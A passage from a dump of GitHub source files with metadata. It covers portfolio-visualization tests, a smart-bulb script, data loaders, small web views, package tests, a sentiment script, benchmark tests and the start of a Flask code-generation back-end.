metrics_table[\"benchmark\"] = \"B\"\n\n fake_plt = Mock()\n fake_plt.subplots.return_value = None, MagicMock()\n fake_pd = Mock()\n\n monkeypatch.setattr(\"deepdow.visualize.plt\", fake_plt)\n monkeypatch.setattr(\"deepdow.visualize.pd\", fake_pd)\n\n plot_metrics(metrics_table)\n\n\nclass TestGenerateWeightsTable:\n def test_errors(self, dataloader_dummy, network_dummy):\n with pytest.raises(TypeError):\n generate_weights_table(\"FAKE\", dataloader_dummy)\n\n with pytest.raises(TypeError):\n generate_weights_table(network_dummy, \"FAKE\")\n\n def test_basic(self, dataloader_dummy, network_dummy):\n weights_table = generate_weights_table(network_dummy, dataloader_dummy)\n\n assert isinstance(weights_table, pd.DataFrame)\n assert len(weights_table) == len(dataloader_dummy.dataset)\n assert set(weights_table.index.to_list()) == set(\n dataloader_dummy.dataset.timestamps\n )\n assert (\n weights_table.columns.to_list()\n == dataloader_dummy.dataset.asset_names\n )\n\n\nclass TestPlotWeightAnim:\n def test_errors(self):\n with pytest.raises(ValueError):\n plot_weight_anim(\n pd.DataFrame([[0, 1], [1, 2]], columns=[\"others\", \"asset_1\"])\n )\n\n with pytest.raises(ValueError):\n plot_weight_anim(\n pd.DataFrame([[0, 1], [1, 2]]), n_displayed_assets=3\n )\n\n with pytest.raises(ValueError):\n plot_weight_anim(\n pd.DataFrame([[0, 1], [1, 2]], columns=[\"a\", \"b\"]),\n n_displayed_assets=1,\n always_visible=[\"a\", \"b\"],\n )\n\n @pytest.mark.parametrize(\n \"colors\",\n [None, {\"asset_1\": \"green\"}, ListedColormap([\"green\", \"red\"])],\n )\n def test_portfolio_evolution(self, monkeypatch, colors):\n n_timesteps = 4\n n_assets = 3\n n_displayed_assets = 2\n\n weights = pd.DataFrame(\n np.random.random((n_timesteps, n_assets)),\n index=pd.date_range(start=\"1/1/2000\", periods=n_timesteps),\n columns=[\"asset_{}\".format(i) for i in range(n_assets)],\n )\n\n weights[\n \"asset_0\"\n ] = 0 # the smallest but we will force its display anyway\n\n fake_functanim = Mock()\n fake_functanim.return_value = Mock(spec=FuncAnimation)\n\n monkeypatch.setattr(\"deepdow.visualize.FuncAnimation\", fake_functanim)\n plt_mock = Mock()\n plt_mock.subplots = Mock(return_value=[Mock(), Mock()])\n\n monkeypatch.setattr(\"deepdow.visualize.plt\", plt_mock)\n ani = plot_weight_anim(\n weights,\n n_displayed_assets=n_displayed_assets,\n always_visible=[\"asset_0\"],\n n_seconds=10,\n figsize=(1, 1),\n colors=colors,\n )\n\n assert isinstance(ani, FuncAnimation)\n\n\nclass TestPlotWeightHeatmap:\n @pytest.mark.parametrize(\"add_sum_column\", [True, False])\n @pytest.mark.parametrize(\"time_format\", [None, \"%d-%m-%Y\"])\n def test_basic(self, time_format, add_sum_column, monkeypatch):\n n_timesteps = 20\n n_assets = 10\n index = (\n list(range(n_timesteps))\n if time_format is None\n else pd.date_range(\"1/1/2000\", periods=n_timesteps)\n )\n\n weights = pd.DataFrame(\n np.random.random(size=(n_timesteps, n_assets)), index=index\n )\n\n fake_axes = Mock(spec=Axes)\n fake_axes.xaxis = Mock()\n\n fake_sns = Mock()\n fake_sns.heatmap.return_value = fake_axes\n\n monkeypatch.setattr(\"deepdow.visualize.sns\", fake_sns)\n ax = plot_weight_heatmap(\n weights, time_format=time_format, add_sum_column=add_sum_column\n )\n\n assert isinstance(ax, Axes)\n assert fake_sns.heatmap.call_count == 1\n assert fake_axes.tick_params.call_count == 2\n\n def test_sum_column(self):\n with pytest.raises(ValueError):\n now = datetime.datetime.now()\n df = pd.DataFrame(\n np.zeros((2, 2)), columns=[\"asset\", \"sum\"], index=[now, now]\n )\n plot_weight_heatmap(df, add_sum_column=True)\n","repo_name":"jankrepl/deepdow","sub_path":"tests/test_visualize.py","file_name":"test_visualize.py","file_ext":"py","file_size_in_byte":6639,"program_lang":"python","lang":"en","doc_type":"code","stars":764,"dataset":"github-code","pt":"37"} +{"seq_id":"30595135461","text":"import time\nimport sys\n\nimport yeelight\n\n\ndef light_control(addr):\n bulb = yeelight.Bulb(addr)\n\n bulb.turn_on()\n bulb.set_rgb(0, 128, 255)\n print('Start lighting...')\n time.sleep(10)\n\n for i in range(0, 256, 15):\n bulb.set_rgb(i, 128 - (int)(i / 5), 255 - i)\n print('R:%d G:%d B:%d' % (i, 128-i/5, 255 - i))\n time.sleep(1)\n\n time.sleep(10)\n bulb.turn_off()\n print('Stop lighting')\n return ()\n\n\nif __name__ == '__main__':\n args = sys.argv\n if 2 <= len(args):\n light_control(args[1])\n else:\n print('Arguments are too short')\n","repo_name":"StudioAquatan/hacku2020","sub_path":"light_control/negative.py","file_name":"negative.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70987444906","text":"from .common import Element\nfrom .method_element import MethodElement\n\n\nclass FieldElement(Element):\n def __init__(self, lines, start):\n Element.__init__(self, lines[start][1:], {\n 0: 'type',\n 1: 'name'\n }, ['private', 'hidebysig'])\n self.end = start\n\n\nclass ClassElement(Element):\n def __init__(self, lines, start):\n # Call parent constructor\n # private, auto, etc are flags\n # With flags and .class ignored, class name is the\n # first token encountered (#0), 'extends' is #1,\n # parent class name is #2.\n Element.__init__(self, lines[start][1:], {\n 0: 'name',\n 2: 'superclass'\n }, ['private', 'auto', 'ansi', 'beforefieldinit'])\n\n self.fields = []\n self.methods = []\n\n # Consume fields and methods from lines until '}' is reached\n start += 1\n while start < len(lines):\n token = lines[start][0]\n if token == '}':\n break\n elif token == '.field':\n self.fields.append(FieldElement(lines, start))\n start = self.fields[-1].end\n elif token == '.method':\n self.methods.append(MethodElement(lines, start))\n start = self.methods[-1].end\n start += 1\n # Set self.end so that the parent Element knows at what line\n # the class stops\n self.end = start\n\n","repo_name":"lukedsmalley/oo-kernel-hacking","sub_path":"src/ciltool/class_element.py","file_name":"class_element.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3393355187","text":"import logging\nimport numpy as np\nimport os\nimport pickle\nimport scipy.sparse as sp\nimport sys\n# import tensorflow as tf\n\nfrom scipy.sparse import linalg\n\n\nclass DataLoader(object):\n def __init__(self, xs, ys, batch_size, pad_with_last_sample=True, shuffle=False):\n \"\"\"\n\n :param xs:\n :param ys:\n :param batch_size:\n :param pad_with_last_sample: pad with the last sample to make number of samples divisible to batch_size.\n \"\"\"\n self.batch_size = batch_size\n self.current_ind = 0\n if pad_with_last_sample:\n num_padding = (batch_size - (len(xs) % batch_size)) % batch_size\n x_padding = np.repeat(xs[-1:], num_padding, axis=0)\n y_padding = np.repeat(ys[-1:], num_padding, axis=0)\n xs = np.concatenate([xs, x_padding], axis=0)\n ys = np.concatenate([ys, y_padding], axis=0)\n self.size = len(xs)\n self.num_batch = int(self.size // self.batch_size)\n if shuffle:\n permutation = np.random.permutation(self.size)\n xs, ys = xs[permutation], ys[permutation]\n self.xs = xs\n self.ys = ys\n\n def get_iterator(self):\n self.current_ind = 0\n\n def _wrapper():\n while self.current_ind < self.num_batch:\n start_ind = self.batch_size * self.current_ind\n end_ind = min(self.size, self.batch_size * (self.current_ind + 1))\n x_i = self.xs[start_ind: end_ind, ...]\n y_i = self.ys[start_ind: end_ind, ...]\n yield (x_i, y_i)\n self.current_ind += 1\n\n return _wrapper()\n\n\nclass StandardScaler:\n \"\"\"\n Standard the input\n \"\"\"\n\n def __init__(self, mean, std):\n self.mean = mean\n self.std = std\n\n def transform(self, data):\n return (data - self.mean) / self.std\n\n def inverse_transform(self, data):\n return (data * self.std) + self.mean\n\ndef latent_input(dataset_dir, batch_size, test_batch_size=None, **kwargs):\n data = {}\n for category in ['train', 'val', 'test']:\n cat_data = np.load(os.path.join(dataset_dir, category + '.npz'))\n data['x_' + category] = cat_data['x']\n data['y_' + category] = cat_data['y']\n print('1: \\n', data['x_' + category].shape, data['y_' + category].shape)\n scaler = StandardScaler(mean=data['x_train'][..., 0].mean(), std=data['x_train'][..., 0].std())\n # Data format\n for category in ['train', 'val', 'test']:\n data['x_' + category][..., 0] = scaler.transform(data['x_' + category][..., 0])\n data['y_' + category][..., 0] = scaler.transform(data['y_' + category][..., 0])\n print('2: \\n', data['x_' + category].shape, data['y_' + category].shape)\n data['train_loader'] = DataLoader(data['x_train'], data['y_train'], batch_size, shuffle=True)\n # data['val_loader'] = DataLoader(data['x_val'], data['y_val'], test_batch_size, shuffle=False)\n # data['test_loader'] = DataLoader(data['x_test'], data['y_test'], test_batch_size, shuffle=False)\n data['scaler'] = scaler\n # print('3: \\n', data['train_loader'].size)\n\n return data\n\n\ndata = latent_input('/mnt/sdb/yujia/DCRNN_PyTorch/data_pm/bpi12_3000_equitemp_45', 4)\n\nfor i, (x,y) in enumerate(data['train_loader']):\n print(x.shape, y.shape)","repo_name":"YujiaHu0819/GNN_PM","sub_path":"DCRNN_PM/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"172779521","text":"from random import random\nfrom PSO import PSO\n\ndef cost_function(pos,target):\n total=0 \n for i in range(len(pos)):\n total+=(target[i]-pos[i])**2\n return total\n\nif __name__ == \"__main__\":\n initial=[50+150*random(),50+150*random()] # initial starting location [x1,x2...]\n # bounds= # input bounds [(x1_min,x1_max),(x2_min,x2_max)...]\n init_target = [60,100]\n PSO(costFunc=cost_function,target=init_target,num_particles=50,maxiter=30)","repo_name":"BADJEMM98/PSO-Algorithm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22501073407","text":"from sanic import Blueprint\nfrom sanic.response import json\n\nbp = Blueprint('api', url_prefix='/api')\n\n\n@bp.get('/')\nasync def api_status(request):\n args = request.args\n print(args)\n res = {\n 'msg': 'OK',\n }\n return json(res)\n","repo_name":"zhengzhou-happywind/api_on_sanic","sub_path":"src/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31197886450","text":"from django.shortcuts import render\nfrom .models import Content\n\n\ndef index(request):\n items = Content.objects.order_by('-upload_at').all()\n context = {\n 'items': items\n }\n return render(request, 'app/index.html', context)","repo_name":"daikiante/heroku","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36357233821","text":"import json\nimport requests\nfrom collections import defaultdict\nfrom json import _default_encoder\n\ndef main():\n data = requests.get( 'http://mysafeinfo.com/api/data?list=englishmonarchs&format=json').json()\n d = defaultdict( lambda: defaultdict( set ) )\n for k in data:\n d[ k [ 'cty' ] ] [ k[ 'hse' ] ].add( k[ 'nm' ] )\n\n def serialize( obj ):\n if isinstance( obj, set ):\n return _default_encoder.encode( list( obj ) )\n return _default_encoder.encode(obj )\n print(json.dumps( d, default=serialize ))\n \nif __name__ == '__main__':\n main()\n","repo_name":"pnihar/Python-scripts-answers","sub_path":"answer1.py","file_name":"answer1.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22462940125","text":"from conans import ConanFile, tools\nimport os\n\nclass TestPackageConan(ConanFile):\n settings = 'os', 'arch', 'build_type'\n\n def build(self):\n pass\n\n def test(self):\n if self.settings.os == 'Windows':\n libs = ['winpr3.lib']\n else:\n libs = ['libwinpr3.a']\n headers = [\n 'sam.h', 'error.h', 'strlst.h', 'input.h', 'winsock.h',\n 'debug.h', 'shell.h', 'pack.h', 'tools/makecert.h', 'version.h',\n 'pool.h', 'sspi.h', 'synch.h', 'timezone.h',\n 'nt.h', 'library.h', 'path.h', 'endian.h', 'security.h',\n 'sysinfo.h', 'file.h', 'cmdline.h', 'winpr.h', 'comm.h', 'stream.h',\n 'sspicli.h', 'registry.h', 'crypto.h', 'windows.h',\n 'environment.h', 'ini.h', 'spec.h', 'ntlm.h', 'intrin.h',\n 'ssl.h', 'thread.h', 'bitstream.h', 'wlog.h', 'handle.h', 'io.h',\n 'user.h', 'clipboard.h', 'pipe.h', 'print.h',\n 'wtsapi.h', 'crt.h', 'interlocked.h', 'memory.h', 'rpc.h',\n 'wtypes.h', 'dsparse.h', 'schannel.h', 'tchar.h', 'smartcard.h',\n 'platform.h', 'image.h', 'bcrypt.h', 'collections.h',\n 'string.h'\n ]\n\n self.output.info('Testing libraries exists:')\n for lib in libs:\n file_path = os.path.join(self.deps_cpp_info['winpr'].rootpath, 'lib', lib)\n\n self.output.info('- %s' % file_path)\n assert os.path.isfile(file_path), 'Missing file: %s' % file_path\n\n self.output.info('Testing headers exists:')\n for header in headers:\n file_path = os.path.join(self.deps_cpp_info['winpr'].rootpath, 'include', 'winpr', header)\n\n self.output.info('- %s' % file_path)\n assert os.path.isfile(os.path.join(file_path)), 'Missing file: %s' % file_path\n","repo_name":"Devolutions/conan-public","sub_path":"recipes/winpr/test_package/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"17678492586","text":"import twint\nfrom transformers import pipeline\nimport numpy as np\n\ntweets = []\nc = twint.Config()\nc.Username = \"lexfridman\"\nc.Limit = 1000\nc.Store_object = True\nc.Hide_output = True\nc.Store_object_tweets_list = tweets\ntwint.run.Search(c)\n\nprint(f\"Tweets fetched: {len(tweets)}\")\nclassifier = pipeline('sentiment-analysis')\nresults = classifier([t.tweet for t in tweets])\n\npositive = [r for r in results if r['label'] == 'POSITIVE']\nnegative = [r for r in results if r['label'] == 'NEGATIVE']\nprint(f\"Positive: {len(positive) / float(len(results)) * 100}% \"\n f\"with average score {np.round(np.sum([r['score'] for r in positive]) / float(len(positive)), 4)}\")\nprint(f\"Negative: {len(negative) / float(len(results)) * 100}% \"\n f\"with average score {np.round(np.sum([r['score'] for r in negative]) / float(len(negative)), 4)}\")\n\n# Output:\n# Tweets fetched: 1000\n# Positive: 62.4% with average score 0.9574\n# Negative: 37.6% with average score 0.9298\n","repo_name":"dredwardhyde/nlp-models-examples","sub_path":"twitter_toxicity.py","file_name":"twitter_toxicity.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"36599016403","text":"\"\"\"This server returns a particuarly large response.\"\"\"\nimport asyncio\nimport threading\nimport sys\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom pygls.server import aio_readline\n\n\ndef handler(data):\n payload = dict(\n jsonrpc=\"2.0\",\n id=1,\n result=dict(\n numbers=list(range(100_000)),\n ),\n )\n content = str(payload).replace(\"'\", '\"')\n message = f\"Content-Length: {len(content)}\\r\\n\\r\\n{content}\".encode(\"utf8\")\n\n sys.stdout.buffer.write(message)\n sys.stdout.flush()\n\n\nasync def main():\n await aio_readline(\n asyncio.get_running_loop(),\n ThreadPoolExecutor(),\n threading.Event(),\n sys.stdin.buffer,\n handler,\n )\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"openlawlibrary/pygls","sub_path":"tests/servers/large_response.py","file_name":"large_response.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":446,"dataset":"github-code","pt":"37"} +{"seq_id":"26615802323","text":"a, b, c = map(int, input().split())\n_max = a + b + c\n\nA = [a, b, c]\nA.sort()\na, b, c = A\n_min = 0 if a + b > c else c - a - b\n\n\nimport math\n\nPI = math.pi\n\nans = (_max ** 2 - _min ** 2) * PI\nprint(ans)\n","repo_name":"mei28/Competitive-programing","sub_path":"mujin_pc_2016/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10192978412","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport shutil\nimport doctest\nimport numpy as np\nimport cocoex as ex\nfrom cocoex import Suite\nfrom cocoex.utilities import about_equal\nfrom cocoex import known_suite_names\nimport example_experiment\n\ndefault_testcases = [\"bbob2009_testcases.txt\"]\n\ndef read_test_vectors(fd):\n \"\"\"\n Read the number of test vectors, followed by the 40D test vectors\n from ${fd}. Return a list of numpy arrays containing the test vectors.\n \"\"\"\n number_of_test_vectors = int(fd.readline().rstrip())\n ## Preallocate the testvectors list\n test_vectors = number_of_test_vectors * [None]\n for i in range(number_of_test_vectors):\n line = fd.readline().rstrip()\n test_vectors[i] = np.fromstring(line, dtype=float, sep=\" \")\n return test_vectors\n\ndef process_test_cases(fd, suite_name, test_vectors):\n \"\"\"\n Read test cases for benchmark suite ${suite_name} from ${fd} and evaluate them.\n \"\"\"\n number_of_testcases = 0\n number_of_failures = 0\n previous_problem_index = None\n suite = Suite(suite_name, \"instances:1-15\", \"\")\n print(\"Testing suite\", suite_name)\n for test_case in fd:\n number_of_testcases += 1\n\n ## A test case is a 4-tuple (deprecated_problem_index, problem_index, test_vector_id,\n ## expected_y) separated by a tab.\n deprecated_problem_index, problem_index, test_vector_id, expected_y = test_case.split()\n ## Do type conversion. Python gurus probably know an elegant\n ## one line solution...\n problem_index = int(problem_index)\n test_vector_id = int(test_vector_id)\n expected_y = float(expected_y)\n\n ## We cache the problem instances because creating an instance\n ## can be expensive depending on the transformation.\n if problem_index != previous_problem_index:\n problem = suite.get_problem(int(problem_index))\n previous_problem_index = problem_index\n test_vector = test_vectors[test_vector_id]\n y = problem(test_vector[:problem.number_of_variables])\n if not about_equal(y, expected_y, 4e-6):\n number_of_failures += 1\n if number_of_failures < 100:\n print(\"%8i %8i FAILED expected=%.8e observed=%.8e\" % (problem_index, test_vector_id, expected_y, y))\n elif number_of_failures == 100:\n print(\"... further failed tests suppressed ...\")\n print(\"%i of %i tests passed (failure rate %.2f%%)\" % (number_of_testcases - number_of_failures, number_of_testcases, (100.0 * number_of_failures) / number_of_testcases))\n if number_of_failures > 0:\n sys.exit(-1)\n\ndef process_testfile(testfile):\n with open(testfile, \"r\") as fd:\n test_suite = fd.readline().rstrip()\n test_vectors = read_test_vectors(fd)\n process_test_cases(fd, test_suite, test_vectors)\n\ndef testmod(module):\n \"\"\"`doctest`s `testmod` method with `raise_on_error=True` setting\"\"\"\n print(\" doctest of %s\" % str(module))\n doctest.testmod(module, # optionflags=doctest.ELLIPSIS,\n raise_on_error=True)\n\ndef best_parameter(f):\n f._best_parameter('print')\n with open('._bbob_problem_best_parameter.txt', 'rt') as file_:\n return [float(s) for s in file_.read().split()]\n\ndef run_constrained_suite_test():\n from collections import defaultdict\n try:\n suite = Suite('bbob-constrained', '', '')\n except NameError:\n return\n counts = defaultdict(int)\n for f in suite:\n counts[-5] += np.any(f.initial_solution < -5)\n counts[5] += np.any(f.initial_solution > 5)\n counts['c'] += np.any(f.constraint(f.initial_solution) > 0)\n counts['b'] += np.any(f.constraint(best_parameter(f)) > 1e-11) # mac: 6.8361219664552603e-12 is the largest value\n assert sum(counts.values()) == 0\n\ndef run_doctests():\n \"\"\"Run doctests on \"all\" modules.\n\n To include this in a unittest environment,\n see https://docs.python.org/2/library/doctest.html#unittest-api\n \"\"\"\n interface = ex.interface if hasattr(ex, 'interface') else ex._interface\n testmod(ex)\n if not sys.version.startswith('3'):\n print(\" CAVEAT: doctest OF cocoex.interface IS, FOR SOME REASON, \" +\n \"INEFFECTIVE IN PYTHON 2 \")\n testmod(interface)\n testmod(example_experiment)\n\n\ndef _clean_up(folder, start_matches, protected):\n \"\"\"permanently remove entries in `folder` which begin with any of\n `start_matches`, where `\"\"` matches any string, and which are not in\n `protected`.\n\n CAVEAT: use with care, as with `\"\", \"\"` as second and third arguments\n this deletes all folder entries like `rm *` does. \"\"\"\n if not os.path.isdir(folder):\n return\n if not protected and \"\" in start_matches:\n raise ValueError(\n '_clean_up(folder, [..., \"\", ...], []) is not permitted, resembles \"rm *\"')\n for d in os.listdir(folder):\n if d not in protected:\n for name in start_matches:\n if d.startswith(name):\n shutil.rmtree(os.path.join(folder, d))\n break\n\n\ndef main(args):\n list_before = os.listdir('exdata') if os.path.isdir('exdata') else []\n print('Running doctests...'), sys.stdout.flush()\n run_doctests()\n print('doctests done.\\nRunning example_experiment:'), sys.stdout.flush()\n example_experiment.main()\n if \"bbob-constrained\" in known_suite_names:\n run_constrained_suite_test()\n for arg in args if args else default_testcases:\n if arg is None or arg == 'None':\n break\n process_testfile(arg) if args or os.path.isfile(arg) else None\n _clean_up('exdata', ['random_search_on_bbob', 'doctest', 'default'], list_before)\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"numbbo/coco","sub_path":"code-experiments/build/python/coco_test.py","file_name":"coco_test.py","file_ext":"py","file_size_in_byte":5887,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"37"} +{"seq_id":"16160845693","text":"from states.menus import menu\n\nclass WinScreen(menu.Menu):\n\n def __init__(self, screen_height, screen_width, name):\n\n self.menuItems = [\n {\"Text\" : \"You Made It\", \"Font\" : 1, \"Link\": False, \"Position\" : {}},\n {\"Text\" : \"\", \"Font\" : 0, \"Link\": False, \"Position\" : {}},\n {\"Text\" : \"Play Again\", \"Font\" : 0, \"Link\": \"Level Menu\", \"Position\" : {}},\n {\"Text\" : \"Main Menu\", \"Font\" : 0, \"Link\": \"Main Menu\", \"Position\" : {}}\n ]\n menu.Menu.__init__(self, screen_height, screen_width, name)\n","repo_name":"jcfug8/pygame_state_controller","sub_path":"states/menus/win_screen.py","file_name":"win_screen.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21150419024","text":"class Solution:\n def numberOfBoomerangs(self, points: List[List[int]]) -> int:\n # Time Complexity: O(N^2)\n # Space Complexity: O(N)\n\n dist_cnt = [Counter() for i in range(len(points))]\n\n ret = 0\n for i in range(len(points)):\n for j in range(i + 1, len(points)):\n fst, snd = points[i], points[j]\n\n dist_sq = (fst[0] - snd[0]) ** 2 + (fst[1] - snd[1]) ** 2\n ret += dist_cnt[i][dist_sq] + dist_cnt[j][dist_sq]\n\n dist_cnt[i][dist_sq] += 1\n dist_cnt[j][dist_sq] += 1\n\n return ret * 2\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/447. Number of Boomerangs/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"23694734076","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport rospy\nimport tf2_ros\nimport common\n\nfrom jaco_msgs.msg import JointVelocity\nfrom std_msgs.msg import Float64\nfrom nav_msgs.msg import Odometry\nfrom sensor_msgs.msg import JointState\nfrom geometry_msgs.msg import TwistStamped\nfrom utils.util_functions import init_tf_stamped, pose2transform\nfrom utils.data_container import DataContainer\n\nREMAPPABLE_NODE_NAME = 'gazebo_interface'\n\nPARAM_NAME_MOBILE_VW_CMD_TOPIC = '~bs_vw_cmd_topic'\nPARAM_NAME_JOINT1_CMD_TOPIC = '~joint1_cmd_topic'\nPARAM_NAME_JOINT2_CMD_TOPIC = '~joint2_cmd_topic'\nPARAM_NAME_JOINT3_CMD_TOPIC = '~joint3_cmd_topic'\nPARAM_NAME_JOINT4_CMD_TOPIC = '~joint4_cmd_topic'\nPARAM_NAME_JOINT5_CMD_TOPIC = '~joint5_cmd_topic'\nPARAM_NAME_JOINT6_CMD_TOPIC = '~joint6_cmd_topic'\nPARAM_NAME_JOINT_STATE_TOPIC = '~joint_state_topic'\nPARAM_NAME_BS_STATE_TOPIC = '~bs_state_topic'\nPARAM_NAME_JOINTVEL_INPUT_TOPIC = '/mico_jointvel_input_topic'\nPARAM_NAME_BS_INPUT_TOPIC = '/blackship_input_topic'\nPARAM_NAME_ARM_JOINT_STATE_TOPIC = '/mico_jointstate_output_topic'\nPARAM_NAME_MOBILE_WHEEL_RADIUS = '/mobile_wheel_radius'\nPARAM_NAME_MOBILE_AXLE_TRACK = '/mobile_axle_track'\n\n\nclass MicoBlackshipGazeboInterface(object):\n def __init__(self):\n self._mobile_vel_cmd_publisher = rospy.Publisher(rospy.get_param(PARAM_NAME_MOBILE_VW_CMD_TOPIC,\n default=PARAM_NAME_MOBILE_VW_CMD_TOPIC[1:]),\n TwistStamped, queue_size=1)\n self._joint_vel_cmd_publishers = []\n\n param_names = [PARAM_NAME_JOINT1_CMD_TOPIC, PARAM_NAME_JOINT2_CMD_TOPIC, PARAM_NAME_JOINT3_CMD_TOPIC,\n PARAM_NAME_JOINT4_CMD_TOPIC, PARAM_NAME_JOINT5_CMD_TOPIC, PARAM_NAME_JOINT6_CMD_TOPIC]\n self._joint_vel_cmd_publishers = [rospy.Publisher(rospy.get_param(param_name, default=param_name[1:]),\n Float64, queue_size=1) for param_name in param_names]\n self._js_publisher = rospy.Publisher(rospy.get_param(PARAM_NAME_ARM_JOINT_STATE_TOPIC),\n JointState, queue_size=1)\n self._joint_state = JointState()\n self.Rw = rospy.get_param(PARAM_NAME_MOBILE_WHEEL_RADIUS)\n self.T = rospy.get_param(PARAM_NAME_MOBILE_AXLE_TRACK)\n self._robot_vel_cur_container = DataContainer('RobotVelCur', data_class=list,\n header_list=['j1', 'j2', 'j3', 'j4', 'j5', 'j6', 'v', 'w'])\n\n def activate(self):\n rospy.Subscriber(rospy.get_param(PARAM_NAME_BS_INPUT_TOPIC,\n default=PARAM_NAME_BS_INPUT_TOPIC[1:]),\n TwistStamped, self._mobile_vel_callback)\n rospy.Subscriber(rospy.get_param(PARAM_NAME_JOINTVEL_INPUT_TOPIC,\n default=PARAM_NAME_JOINTVEL_INPUT_TOPIC[1:]),\n JointVelocity, self._joint_vel_callback)\n rospy.Subscriber(rospy.get_param(PARAM_NAME_JOINT_STATE_TOPIC,\n default=PARAM_NAME_JOINT_STATE_TOPIC[1:]),\n JointState, self._joint_state_callback)\n rospy.Subscriber(rospy.get_param(PARAM_NAME_BS_STATE_TOPIC,\n default=PARAM_NAME_BS_STATE_TOPIC[1:]),\n JointState, self._bs_state_callback)\n return self\n\n def _mobile_vel_callback(self, twist_stamped):\n self._mobile_vel_cmd_publisher.publish(twist_stamped)\n\n def _joint_vel_callback(self, joint_vel):\n for attr, publisher in zip(JointVelocity.__slots__, self._joint_vel_cmd_publishers):\n publisher.publish(Float64(data=getattr(joint_vel, attr)))\n\n def _joint_state_callback(self, js):\n self._joint_state = js\n self._js_publisher.publish(js)\n\n def _bs_state_callback(self, js):\n thetal_dot = (js.velocity[0] + js.velocity[2]) * 0.5\n thetar_dot = (js.velocity[1] + js.velocity[3]) * 0.5\n v = (thetal_dot + thetar_dot) * self.Rw /2\n w = (thetal_dot - thetar_dot) * self.Rw / self.T\n self._robot_vel_cur_container.write(list(self._joint_state.velocity) + [v, w])\n\n# --------------------------------------------\nif __name__ == '__main__':\n rospy.init_node(REMAPPABLE_NODE_NAME, anonymous=True)\n gazebo_if = MicoBlackshipGazeboInterface().activate()\n rospy.spin()\n","repo_name":"mu-777/predictive_display_for_mobile_manipulator","sub_path":"mobile_manipulator_simulator/src/mico_bs_gazebo_interface.py","file_name":"mico_bs_gazebo_interface.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17370786112","text":"from flask import Flask, request, send_file\nfrom flask_cors import CORS\nfrom copy import deepcopy\nimport json\nimport os\nfrom dotenv import load_dotenv\nfrom code_generation.code_generator_eip import create_routes\nfrom code_generation.code_generator_kalei import create_kalei\nfrom code_generation.parser import parse\nfrom code_generation.project_generator_eip import create_project\nfrom code_generation.project_generator_kalei import generate_and_eval_kalei\nfrom project_storage.project_storage import saveProject, loadProject, getAllProjectsFromClient\nfrom user_storage.user_storage import clientLogin, addClient, createTables\nfrom uuid import uuid4\nfrom datetime import timedelta\nfrom errors import InvalidClientEmail\nimport redis\n\napp = Flask(__name__)\napp.secret_key = str(uuid4())\n\nload_dotenv()\n\nCORS(app)\n\nr = redis.Redis(host=os.environ['REDIS_HOST'],\n port=os.environ['REDIS_PORT'], password=os.environ['REDIS_PASSWORD'])\n\n# session = {}\n# user_generated_files = {}\nr.set('session', json.dumps({}))\nr.set('user_generated_files', json.dumps({}))\n\ndef check_logged_session(request):\n session = json.loads(r.get('session'))\n print(\"check_logged_session\")\n print(session)\n client_email = request.json['client_email']\n print(\"client_email\")\n print(client_email)\n\n # # TEMP\n # return True\n \n if client_email in session:\n return True\n else:\n return False\n\ndef add_user_generated_file(request, file_name):\n client_email = request.json['client_email']\n\n user_generated_files = json.loads(r.get('user_generated_files'))\n if client_email not in user_generated_files:\n user_generated_files[client_email] = []\n\n user_generated_files[client_email].append(file_name)\n r.set('user_generated_files', json.dumps(user_generated_files))\n\ndef remove_user_generated_files(request):\n client_email = request.json['client_email']\n\n user_generated_files = json.loads(r.get('user_generated_files'))\n\n if client_email in user_generated_files:\n for f in user_generated_files[client_email]:\n os.remove(os.path.join(\"projetos_gerados\", f))\n\n user_generated_files.pop(client_email, None)\n r.set('user_generated_files', json.dumps(user_generated_files))\n\n@app.route('/')\ndef index():\n return \"TCC back-end\"\n\n@app.route('/generate_code', methods=['POST'])\ndef generate_code():\n print(\"GENERATE 